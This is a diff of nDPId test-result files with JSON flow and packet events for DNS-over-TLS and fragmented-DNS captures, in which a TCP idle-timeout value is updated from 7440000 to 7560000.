+01643{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1572783663234,"flow_last_seen":1572783663319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":3267,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1572783663319,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"2b341b88c742e940cfb485ce7d93dde7","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"BE:73:46:2A:2E:FB:A9:E9:42:D0:71:10:1B:8C:BF:44:6A:5D:AD:53"}} +01056{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1572783663234,"flow_last_seen":1572783666246,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":4269,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1572783666246,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":24,"source":"dns_dot.pcap","alias":"nDPId-test","packets-captured":24,"packets-processed":24,"total-skipped-flows":0,"total-l4-data-len":4269,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1572783666246} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 24/24 diff --git a/test/results/dns_fragmented.pcap.out b/test/results/dns_fragmented.pcap.out index 5d92a45d9..27ce94ee2 100644 --- a/test/results/dns_fragmented.pcap.out +++ b/test/results/dns_fragmented.pcap.out @@ -118,25 +118,25 @@ 00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913732,"flow_last_seen":1560869913732,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869913732,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1560869913751,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":134,"pkt_l4_len":80,"thread_ts_msec":1560869913751,"pkt":"AAwpfKTLCFsOoYNeht1gDizvAFARPCYGRwBHAAAAAAAAAAAAEREgAQRwHwsWsAIMKf\/+fKTLADXshgBQyy0\/f4GAAAEAAQAAAAEDbnMyCHdlYmVyZG5zAmRlAAAcAAHADAAcAAEAAA4QABAgAQRwHwsWsAAAAAAKJgBTAAApBawAAAAAAAA="} 00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869913732,"flow_last_seen":1560869913751,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1560869913751,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} -00621{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1560869913753,"pkt":"AAwpYjEqAAwpfKTLht1gD07UACgGQCABBHAfCxawAgwp\/\/58pMsgAQRwHwsWsAAAAAAKJgBT3wEANSHNFggAAAAAoAJfUI5TAAACBATEBAIICoRF3zoAAAAAAQMDBw=="} -00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1560869913753,"pkt":"AAwpfKTLAAwpYjEqht1gBqwSACgGQCABBHAfCxawAAAAAAomAFMgAQRwHwsWsAIMKf\/+fKTLADXfAVwH8KghzRYJoBJeYK7OAAACBATEBAIIChJ809KERd86AQMDBw=="} -00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1560869913753,"pkt":"AAwpYjEqAAwpfKTLht1gD07UACAGQCABBHAfCxawAgwp\/\/58pMsgAQRwHwsWsAAAAAAKJgBT3wEANSHNFglcB\/CpgBAAv45LAAABAQgKhEXfOxJ809I="} -00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":50,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869913753,"flow_last_seen":1560869913754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869913754,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} +00621{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1560869913753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1560869913753,"pkt":"AAwpYjEqAAwpfKTLht1gD07UACgGQCABBHAfCxawAgwp\/\/58pMsgAQRwHwsWsAAAAAAKJgBT3wEANSHNFggAAAAAoAJfUI5TAAACBATEBAIICoRF3zoAAAAAAQMDBw=="} +00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1560869913753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1560869913753,"pkt":"AAwpfKTLAAwpYjEqht1gBqwSACgGQCABBHAfCxawAAAAAAomAFMgAQRwHwsWsAIMKf\/+fKTLADXfAVwH8KghzRYJoBJeYK7OAAACBATEBAIIChJ809KERd86AQMDBw=="} +00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1560869913753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1560869913753,"pkt":"AAwpYjEqAAwpfKTLht1gD07UACAGQCABBHAfCxawAgwp\/\/58pMsgAQRwHwsWsAAAAAAKJgBT3wEANSHNFglcB\/CpgBAAv45LAAABAQgKhEXfOxJ809I="} +00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":50,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869913753,"flow_last_seen":1560869913754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869913754,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916459,"flow_last_seen":1560869916459,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869916459,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1560869916459,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":106,"pkt_l4_len":52,"thread_ts_msec":1560869916459,"pkt":"CFsOoYNeAAwpfKTLht1gAxE1ADQRQCABBHAfCxawAgwp\/\/58pMsmBkcARwAAAAAAAAAAABER1T4ANQA07tzo3wEAAAEAAAAAAAEDbnMyCHdlYmVyZG5zAmRlAAABAAEAACkCAAAAAAAAAA=="} 00807{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916459,"flow_last_seen":1560869916459,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869916459,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1560869916473,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":122,"pkt_l4_len":68,"thread_ts_msec":1560869916473,"pkt":"AAwpfKTLCFsOoYNeht1gCEAKAEQRPCYGRwBHAAAAAAAAAAAAEREgAQRwHwsWsAIMKf\/+fKTLADXVPgBEGsro34GAAAEAAQAAAAEDbnMyCHdlYmVyZG5zAmRlAAABAAHADAABAAEAAA4QAATC9wUOAAApBawAAAAAAAA="} 00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869916459,"flow_last_seen":1560869916473,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869916473,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.5.14"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916474,"flow_last_seen":1560869916474,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1560869916474,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1560869916474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1560869916474,"pkt":"AAwpYjEqAAwpfKTLCABFAAA8zqNAAEAG3BXC9wUGwvcFDphdADXWgnc5AAAAAKACchCQMQAAAgQFtAQCCAox8fNRAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1560869916475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1560869916475,"pkt":"AAwpfKTLAAwpYjEqCABFAAA8AABAAEAGqrnC9wUOwvcFBgA1mF3frqtz1oJ3OqAScSDR+QAAAgQFtAQCCAqVd0imMfHzUQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1560869916475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1560869916475,"pkt":"AAwpYjEqAAwpfKTLCABFAAA0zqRAAEAG3BzC9wUGwvcFDphdADXWgnc6366rdIAQAOWQKQAAAQEICjHx81GVd0im"} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916474,"flow_last_seen":1560869916474,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1560869916474,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1560869916474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1560869916474,"pkt":"AAwpYjEqAAwpfKTLCABFAAA8zqNAAEAG3BXC9wUGwvcFDphdADXWgnc5AAAAAKACchCQMQAAAgQFtAQCCAox8fNRAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1560869916475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1560869916475,"pkt":"AAwpfKTLAAwpYjEqCABFAAA8AABAAEAGqrnC9wUOwvcFBgA1mF3frqtz1oJ3OqAScSDR+QAAAgQFtAQCCAqVd0imMfHzUQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1560869916475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1560869916475,"pkt":"AAwpYjEqAAwpfKTLCABFAAA0zqRAAEAG3BzC9wUGwvcFDphdADXWgnc6366rdIAQAOWQKQAAAQEICjHx81GVd0im"} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869913732,"flow_last_seen":1560869913751,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869916474,"flow_last_seen":1560869916477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869916474,"flow_last_seen":1560869916477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 